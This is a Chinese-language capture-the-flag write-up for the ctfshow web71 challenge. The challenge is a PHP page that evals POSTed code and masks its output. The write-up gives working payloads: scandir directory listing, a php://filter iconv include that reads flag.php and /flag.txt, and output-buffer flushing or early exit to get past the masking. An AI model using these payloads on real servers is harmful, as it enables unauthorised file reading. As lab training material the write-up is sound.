[ctfshow web入门] web71

信息收集

下载index.php并查看

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗？
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);$s = ob_get_contents();ob_end_clean();echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{highlight_file(__FILE__);
}

ob_get_contents：可以获取缓冲区中的内容，并将其存储在变量中，以便进一步处理或保存。
‌ob_end_clean：用于清空输出缓冲区的内容，并关闭输出缓冲。
preg_replace：按照正则表达式替换字符，这里是将0-9 a-z替换成?

没什么用的小知识：
众所周不知，我们输出的时候，比如print是将内容发送到缓冲区的，然后系统会在恰当的时机自动帮我们把缓冲区的内容输出打印。这是我学C++的时候学的，我大胆猜测php原理大致相似。

解题

ob_end_clean删除最上面的输出缓冲区并输出其内容。
那么解题思路是不让他清空，而是让它在清空前打印出来就好了
查看PHP 输出控制函数，看看有什么函数可以利用的

利用php输出控制函数

这几个函数都可以：

ob_end_flush();
ob_flush();
ob_get_flush();
ob_start();

前三个原理都是提前输出
ob_start是创建一个新的缓冲区，而ob_end_clean()是删除最顶层的输出缓冲区及其所有内容，这刚好删除了最新创建的那个缓冲去的所有内容，保护了之前的那个缓冲区。

new buffer  --> ob_end_clean
eval($c) buffer
other buffer
......

---

flag.php显然没有flag，查根目录flag在/flag.txt

c=var_export(scandir('.'));ob_end_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");ob_flush();
c=var_export(scandir('/'));ob_get_flush();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");ob_start();

解题的截图放在最后

程序提前死亡

只要程序提前死了，那么后续的代码就不会执行了

c=var_export(scandir('/'));exit();
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");die();

---

这一题的重点在于绕过ob_end_clean删除缓冲区，所以关于读目录和关于读文件的更多方法不再展示，有需要可以观看前面的章节。

---

web    目录    web